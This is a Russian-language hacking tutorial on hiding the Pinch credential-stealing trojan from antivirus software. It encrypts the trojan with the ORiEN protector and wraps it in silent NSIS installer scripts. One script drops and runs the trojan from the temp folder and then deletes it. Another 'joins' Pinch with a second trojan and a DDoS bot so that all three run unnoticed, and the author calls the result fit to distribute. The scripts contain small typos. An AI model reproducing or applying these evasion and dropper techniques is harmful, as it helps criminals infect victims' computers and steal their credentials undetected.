В этой статье я расскажу Вам, как закриптовать троян или склеить несколько exe-файлов вредоносного ПО подручными средствами и избежать его детектирование любыми антивирусами.
Рассмотрим скрытие от антивирусов трояна Pinch, как наиболее часто применяемого на территории бывшего СССР да и не только.
Из подручных средств нам понадобится протектор ORiEN и система для создания инсталляторов Nullsoft Scriptable Install System(NSIS). Выбор именно этих средств обусловлен малым размером приклеиваемого стаба(что сказывается довольно малым увеличением, а с учетом компрессии зачастую и уменьшением размера криптованного файла по сравнению с исходным) и их бесплатностью.
Итак, начнем.
Сначала скачаем и установим вышеупомянутые инструменты с их официальных сайтов:
ORiEN: http://zalexf.narod.ru/
NSIS: http://nsis.sourceforge.net/
Затем запустим протектор ORiEN
С помощью кнопки Обзор укажем путь к пинчу. Затем перейдем к вкладке Пароль и установим его чтение из командной строки. Затем введем в первое поле ввода любой пароль(главное не забыть его до конца процедуры криптования) – им будет шифроваться наш троян. После ввода пароля чекбокс наротив поля ввода станет активен – отметим его.
После этого станет активен другой чекбокс – Защита по паролю. Его тоже необходимо отметить. После выполнения этих операций нажимаем кнопку Старт. Теперь желательно протестировать зашифрованный файл. Для этого просто запускаем его и если появляется MsgBox с сообщением ”Неверный пароль”, то криптование прошло успешно.
Теперь можно переходить к следующему этапу – созданию инсталлятора с помощью NSIS.
Создадим текстовый документ и вставим в него следующий код:
Код:
<br /><br />
OutFile "crypted.exe"<br /><br />
SilentInstall silent<br /><br />
Section "crypt"<br /><br />
SetOutPath "$TEMP"<br /><br />
SetOverwrite on<br /><br />
File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"<br /><br />
Execwait "$TEMP\pinch.exe !psw=123"<br /><br />
Delete $TEMP\pinch.exe<br /><br />
SectionEnd<br /><br />
Теперь необходимо немного отредактировать этот код.
В строке File "C:\Documents and Settings\gol\Рабочий стол\pinch. exe" должен находиться правильный путь к зашифрованному файлу, полученному с помощью протектора ORiEN на предыдущем этапе.
В строке Exec "$TEMP\pinch.exe !psw=123" после !psw= должен быть указан пароль, которым мы шифровали файл. Сохраним созданный текстовый файл.
Теперь запустим утилиту MakeNSISW соответствующим ярлыком из меню ”Пуск”
Перетащим туда созданный текстовый файл. Если все сделано правильно, на рабочем столе должен появиться файл crypt.exe, который можно спокойно распространять.
Также NSIS может использоваться в качестве неплохого джойнера. Для этого в скрипте инсталлятора необходимо использовать директиву File и Exec вместо Execwait несколько раз.
Например чтобы склеить 3 файла, скрипт для NSIS будет выглядеть следующим образом:
Код:
<br /><br />
OutFile "joined.exe"<br /><br />
SilentInstall silent<br /><br />
<br /><br />
Section "file1"<br /><br />
&nbsp; SetOutPath "$TEMP"<br /><br />
&nbsp; SetOverwrite on<br /><br />
&nbsp; File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"<br /><br />
&nbsp; Exec $TEMP\pinch.exeSectionEnd<br /><br />
<br /><br />
Section "file2"<br /><br />
&nbsp; etOutPath "$TEMP"<br /><br />
&nbsp; SetOverwrite on<br /><br />
&nbsp; File "C:\Documents and Settings\adm\Рабочий стол\wmtroj.exe"<br /><br />
&nbsp; Exec $TEMP\wmtroj.exe<br /><br />
SectionEnd<br /><br />
<br /><br />
Section "file3"<br /><br />
&nbsp; SetOutPath "$TEMP"<br /><br />
&nbsp; SetOverwrite on<br /><br />
&nbsp; File "C:\Documents and Settings\adm\Рабочий стол\ddosbot.exe"<br /><br />
&nbsp; Exec $TEMP\ddosbot.exe<br /><br />
SectionEnd
Если будет необходимо удалить файлы после их запуска, то желательно использовать Execwait и Delete.
Теперь о размере закриптованного файла:
После конфигурирования паблик-пинча от Vaska он имел размер 50 кб в несжатом виде.
После криптования пинч стал весить 65 кб. По сравнению с криптованием протектором типа Themida, где пинч увеличивается в размере с 50 кб до 380 кб описанный способ имеет неоспоримые преимущества. Увеличение объема файла вполне соизмеримо с результатами работы приватными крипторами, актуальные версии которых доступны далеко не всем.
